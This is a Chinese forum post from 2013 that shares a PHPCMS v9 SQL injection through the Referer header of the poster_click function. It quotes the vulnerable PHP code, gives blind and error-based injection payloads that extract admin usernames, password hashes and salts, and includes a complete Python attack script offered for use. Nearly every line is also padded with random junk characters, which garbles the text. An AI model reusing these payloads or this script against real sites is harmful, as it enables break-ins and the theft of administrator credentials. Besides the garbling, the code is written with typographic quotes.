有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:3 b- C* ?8 I) x! Y6 e
/ P7 }- E; V$ v4 I$ i8 x
问题函数\phpcms\modules\poster\index.php2 z8 `: A5 @" E6 B
- \7 C' c. n; J6 s6 i8 H
public function poster_click() {
! B+ a' e) z9 M" p, o$id = isset($_GET['id']) ? intval($_GET['id']) : 0;2 ^& L J$ |" T v0 q
$r = $this->db->get_one(array('id'=>$id));
% B; t, {* R* M0 Pif (!is_array($r) && empty($r)) return false;, p0 x3 z0 C d0 o# e
$ip_area = pc_base::load_sys_class('ip_area');
1 f$ h, X& F) ~7 H8 |$ip = ip();* G8 f, O2 B$ @& T
$area = $ip_area->get($ip);
5 B3 S/ `. G7 N, S; Q# y$username = param::get_cookie('username') ? param::get_cookie('username') : '';
% G# h% u5 l8 S, W0 x/ v( o8 tif($id) {
/ R! ~ n- k8 `! \) f" Z$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
( s8 o9 K M c, E; j6 o; c$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));5 w1 Q) ?) _% N
}
2 G# A. ]; {; y/ y. Z5 U$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
" `( W* h: t9 _/ }1 V, X$setting = string2array($r['setting']);
4 L/ U! t* u( F( d3 z$ Yif (count($setting)==1) {) u2 g0 `" Z. d
$url = $setting['1']['linkurl'];
' ^$ i1 O; v+ |/ n a, X' ?; j* x} else {
& ?# e" g! s0 S8 ?& F$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
6 g& B! p2 d: C9 B. j$ O N}& J0 _& P3 l# v0 W
header('Location: '.$url);
5 c3 ~) r* r- H: r5 W4 F}
2 A0 L* C& v. E' E% Y2 _2 n$ m, Z. x4 P* g6 a r2 K
6 {. ~: ]' w7 t8 v" U% m
. e1 u# R4 R) R- b利用方式:
5 e) Z1 z3 i8 k3 R# M' W7 k ?% r [' k0 D9 b& ]9 Z2 R
1、可以采用盲注入的手法:
& u( m% R2 h; a _2 a" d- C/ A4 Y! a; _! j2 `# b) X: R( V% O/ x) G, E/ B
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
) v. }8 m1 x% q+ F' e3 }3 X* ?/ E6 p2 \
通过返回页面,正常与否一个个猜解密码字段。* p+ p# j. {! Z4 b
, n4 U X5 P* Q6 w; o; K2、代码是花开写的,随手附上了:
. }5 q* H9 g" B; r7 R, o
* T' c* v7 ~, @% @1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#! C1 N; V+ c, \% G) a6 T/ }3 N
2 ~; S$ J* {- j" ~& m2 z
此方法是爆错注入手法,原理自查。
6 N5 G# i2 K. T" ~; S7 C% _9 q, D7 f7 k# W; E: `
: V( F3 B: p1 I; Z, x
1 D# a% l( T( n$ y7 E利用程序:
: n3 \* @' I' S0 J1 }. B) p* S- z. b3 ]# ]4 S# ]) L5 Z, [
#!/usr/bin/env python
, b/ v3 c0 N l( U& vimport httplib,sys,re
; k( k: x, C, J, \) S0 }# n
# J0 n X L2 r9 h: udef attack():
; Y7 |" Y P0 z; ]. v% Iprint “Code by Pax.Mac Team conqu3r!”
2 b; `, c; R; X( \3 {: aprint “Welcome to our zone!!!”, v: D" F+ R8 X2 D9 R% r
url=sys.argv[1]
. _6 ~) b( E" ]* w5 h4 m+ ?2 \paths=sys.argv[2]6 _$ K9 l1 Y1 D1 g
conn = httplib.HTTPConnection(url)7 L1 K" N1 }+ d: r
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,* _% I1 G/ s; }. L
“Accept”: “text/plain”,
3 U# s# `: l2 V) L2 h“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
* V& \# A) `9 b3 B" Lconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
. Z' @7 L' o! R7 C* c; Lr1 = conn.getresponse()
/ A) K( n" h8 S6 U' Qdatas=r1.read()% K, F; c3 ~. @% N/ w
datas=re.findall(r”Duplicate entry \’\w+’”, datas)" q3 Q% @& ~ I$ B$ U0 W Q
print datas[0]
, o# @" g1 h$ d3 Y3 ~$ Jconn.close()# [6 Y6 a+ B$ [2 L; z! W
if __name__==”__main__”:7 d2 a5 H- [1 R: l+ D( B
if len(sys.argv)<3:: q& ^% L6 L/ i3 C% P: ] l
print “Code by Pax.Mac Team conqu3r”
1 H& S( r+ i6 ` O* |print “Usgae:”
' j) O5 _/ {3 _$ Hprint “ phpcmsattack.py www.paxmac.org /”
2 |) l) R$ ?0 } ?0 |print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
S( q( r5 d/ f6 Msys.exit(1)
' ]' L0 x# v: ]3 N n2 m; ~* Rattack()
, ]8 r# J# X: G2 q0 a+ k
$ o& O* ^% r7 W. C+ v# L, j |
发表于 2013-1-11 21:01:00
收藏
支持
反对